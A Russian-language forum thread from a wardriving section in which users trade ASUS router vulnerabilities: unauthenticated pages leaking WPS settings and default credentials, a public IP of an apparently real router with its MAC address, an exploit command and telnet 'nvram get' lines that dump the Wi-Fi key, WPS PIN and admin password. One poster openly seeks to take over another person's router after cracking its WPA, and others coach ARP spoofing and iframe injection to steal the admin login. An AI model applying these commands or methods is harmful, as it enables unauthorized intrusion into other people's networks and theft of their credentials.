Новая уязвимость в точках ASUS

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 2 Apr 2014.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,936
    Likes Received:
    7,340
    Reputations:
    97
    Вот вам ещё уязвимость ASUS:

    http://192.168.1.1/WPS_info.asp
    Показывает настройки дочки доступа.
    Обнаружил только что, данная тема промотивировала :)

    Уязвимы:
    ASUS RT-N13
    ASUS RT-N13U
    ASUS RT-N13U Rev.B1
    ASUS RT-N56U

    http://192.168.1.1/QIS_wizard.htm
    <input type="hidden" name="http_username" value="admin">
    <input type="hidden" name="http_passwd" value="admin">

    Уязвимы:
    ASUS RT-N13
    ASUS RT-N13U
    ASUS RT-N13U Rev.B1
     
    #21 binarymaster, 23 May 2014
    Last edited: 28 May 2014
  2. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,893
    Reputations:
    57
    Спасибо!!! Сегодня сейчас допишу в свою программку. Но у меня их неоткрытых очень мало!
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,936
    Likes Received:
    7,340
    Reputations:
    97
    Не за что :)

    Вот ещё -
    http://90.155.158.9/get_webdavInfo.asp
    Уязвимость получения информации SSID, BSSID, версии прошивки и т.п.

    Code:
    // pktInfo=['PrinterInfo','SSID','NetMask','ProductID','FWVersion','OPMode','MACAddr','Regulation'];
    pktInfo=['','inet','255.255.255.0','RT-N66U','3.0.0.4.270','1','60:A4:4C:EF:F2:08',''];
    // webdavInfo=['Webdav','HTTPType','HTTPPort','DDNS','HostName','WAN0IPAddr','','xSetting','HTTPSPort'];
    webdavInfo=['0','2','8082','0','','90.155.158.9','','1','443'];
    Уязвим:
    ASUS RT-N66U
    ASUS RT-AC68U
    ASUS RT-N16
    ASUS RT-AC66U
    ASUS RT-N56U
    ASUS RT-N65U
     
    #23 binarymaster, 23 May 2014
    Last edited: 28 May 2014
  4. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,893
    Reputations:
    57
    Дописал уязвимость:
    http://192.168.1.1/QIS_wizard.htm
    <input type="hidden" name="http_username" value="admin">
    <input type="hidden" name="http_passwd" value="admin">

    Уязвимы:
    ASUS RT-N13U
    ASUS RT-N13U Rev.B1

    чуть незабыл она выбирается в 'Comand:'
    ТЫЦ

    А вот немного просканил и открылись:


    ASUS RT-G32 Rev.C1
    ASUS RT-G32
    ASUS RT-N10 Rev.B1
    ASUS RT-N10
    ASUS RT-N10+
    ASUS RT-N10E
    ASUS RT-N10LX
    ASUS RT-N12E
    ASUS RT-N12LX
    ASUS RT-N13U Rev.B1
    ASUS RT-N13U
    ASUS WL-520GU
    RT-N10LX
     
    #24 VladimirV, 23 May 2014
    Last edited: 23 May 2014
  5. asdm

    asdm Member

    Joined:
    4 Jun 2013
    Messages:
    169
    Likes Received:
    19
    Reputations:
    0
    у меня сработало только на одном rt-ac66u и rt-n12c1
     
  6. LastHero

    LastHero New Member

    Joined:
    30 May 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    на моем asus dsl-n10 тоже работает данная уязвимость
     
  7. HavingingWor

    HavingingWor New Member

    Joined:
    11 Jan 2012
    Messages:
    61
    Likes Received:
    4
    Reputations:
    0
    что то на N10 не работают ваши уязвимости, какие еще предложения, кроме перебора есть?
     
  8. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    724
    Likes Received:
    829
    Reputations:
    16
    Искать новые уязвимости самостоятельно. Срабатывание текущих експлойтов на асусах зависит от прошивок.
     
  9. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,893
    Reputations:
    57
    Если у кого-то осталась программка просьба выложить!
     
  10. henri2002

    henri2002 Active Member

    Joined:
    25 Sep 2013
    Messages:
    381
    Likes Received:
    278
    Reputations:
    3
    через пару часиков выложу, если кто раньше не выложит.

    з.ы что у автора проги не осталось :)

    http://rghost.ru/58102445
     
    #30 henri2002, 19 Sep 2014
    Last edited: 19 Sep 2014
    1 person likes this.
  11. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,893
    Reputations:
    57
    Я ее переписал под свои нужды а в личку попросили!
    Вроде нашел сам.
    Ссылка обновилась.
    Всем спасибо!
    ТЫЦ
     
    #31 VladimirV, 19 Sep 2014
    Last edited: 19 Sep 2014
  12. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    спасибо
     
  13. slav0nic

    slav0nic Member

    Joined:
    11 Jul 2008
    Messages:
    11
    Likes Received:
    7
    Reputations:
    2
    под асусы есть хороший сплоит https://github.com/jduck/asus-cmd/blob/master/others/fp-xdb-35688.py (если порт 9999 открыт, то есть шанс)
    на N15U прокатило, хотя баг описаный выше -нет
    пароль выдирается из памяти устройства:
    Code:
    python3 fp-xdb-35688.py 192.168.1.1 "/usr/sbin/nvram get http_passwd"
     
    dragonking, Vikhedgehog and user100 like this.
  14. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    58
    Reputations:
    0
    так а как выдрать можно,если к точке не подключен :)
     
  15. Vikhedgehog

    Vikhedgehog Member

    Joined:
    24 Jul 2013
    Messages:
    349
    Likes Received:
    76
    Reputations:
    15
    Новая порция эксплоитов для асусов: http://habrahabr.ru/post/253013/

    Кстати, уязвимость о которой говорил предыдущий пользователь теперь есть и как программка для винды (AsusCmd.exe). Из-за ограничений этой уязвимости, советую ее использовать только для включения telnet на роутере. Далее через telnet можно

    cd /bin
    nvram get wl_ssid
    nvram get wl_wpa_psk
    nvram get wps_device_pin
    nvram get http_passwd

    nvram set тоже есть, короче полный доступ, даже лучше админки :)
     
    1 person likes this.
  16. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    47
    Likes Received:
    5
    Reputations:
    0
    Хотел оживить тему таким вопросом. Есть точка ASUS RT-N11P со вскрытым WPA, нужно зайти в админку, пароль видимо пользователь установил свой. Пробовал уязвимости из этой темы - открывается вроде http://192.168.1.1/error_page.htm, но поиск в исходном коде ничего не даёт. Пробовал РоутерСкан 2.53 - вбил в него 192.168.1.1 (адрес в локалке при подключенном wifi, адрес моего роутера через который подключаюсь установил 192.168.2.1), настройки программы не трогал - всё по умолчанию - выдаёт только версию прошивки ASUS RT-N11P, firmware: 2.0. На сколько понял (читал где-то) в этой версии РоутерСкана имеются эксплойты для этой модели. Возможно что-то делаю не так - подскажите, может быть есть какие тонкости, и если всё правильно, в чём может быть проблема - вероятно в этой версии прошивки все дыры закрыты? Так же пробовал прогу AsusCmd.exe отсюда https://habrahabr.ru/post/253013/, так же при wifi подключении, выдаёт всегда LOST - возможно команду не правильно ввёл, если не сложно - можно пример правильного использования программы?

    Дальше решил попробовать mdk3 + wireshark (советовали перехватить пароль при входе пользователя в админку) - если правильно мыслю, нужно заставить человека войти в админку - деаутентификация всех клиентов от точки - mdk3 для этого должна подойти (ей владею), дальше перехват пароля в wireshark (которую нужно освоить). Вопросы выше просто чтобы понять, все ли средства использовал (и правильно ли), и больше ничего не сработает, прежде чем использовать "тяжёлую артиллерию" и физически мешать человеку :). И правильно ли мыслю про mdk3 + wireshark (может быть есть способы проще)?
     
    #36 Slayer, 28 Jun 2017
    Last edited: 28 Jun 2017
  17. VasiliyP

    VasiliyP Active Member

    Joined:
    30 Aug 2011
    Messages:
    157
    Likes Received:
    177
    Reputations:
    3
    Для asus можно сделать так: В http трафик клиента, в html код страничек вставляется фрейм со ссылкой на страничку роутера, браузер клиента при загрузке либо отдаст логин + пароль сам, если его знает, либо будет требовать его у юзера, пока тот не введёт правильный. После чего остаётся декодировать соотв. хидер в запросе браузера к роутеру.
     
    Slayer likes this.
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,936
    Likes Received:
    7,340
    Reputations:
    97
    Если вы уже внутри сети, не стоит заморачиваться mdk3 и деаутентификациями, проще и удобнее использовать методики MITM (о чём написано постом выше).
     
    Slayer likes this.
  19. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    47
    Likes Received:
    5
    Reputations:
    0
    Спасибо за инфу, "человек по середине" :) - читал про такое, буду изучать и пробовать.
     
  20. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    47
    Likes Received:
    5
    Reputations:
    0
    Разобрался более-менее с MITM, организовал АРП-спуфинг при помощи arpspoof, снифер - wireshark. Хотел попросить, если не сложно, в виде примера показать каким образом вставляется фрейм для автоперенаправления всех запросов в админку роутера (в этом профан, не знаю с какой стороны подойти :)):
    Ещё хотел уточнить такой момент - пробовал разными способами механизм работы MITM (ettercap, и т.д.) - остановился на вышеперечисленных arpspoof + wireshark - всё работает без тормозов и глюков - тестировал на собственной импровизированной сети (2 цели - планшет на Андройде и роутер на OpenWrt, атакующий комп с Арчем и адаптером DWA-582) . Пробовал каким образом происходит снифинг пароля админки (фильтрация в акуле по http.request.method == "POST") - в этой пробной сети передаётся открыто, сразу увидел логин+пароль. Дальше организовал уже на реальной сети с роутером ASUS (про который выше), произвёл пробную авторизацию в админку роутера, просто на вскидку admin 12345, получил такое:

    Правильно ли понимаю, что введённая (неверная) пара логин+пароль зашифрована в YWRtaW46MTIzNDU%3D (о чём выше), и если да, как это расшифровывается (т.е. нужно в сторону hashcat смотреть - ей владею)?
     
    #40 Slayer, 10 Jul 2017
    Last edited: 10 Jul 2017
Loading...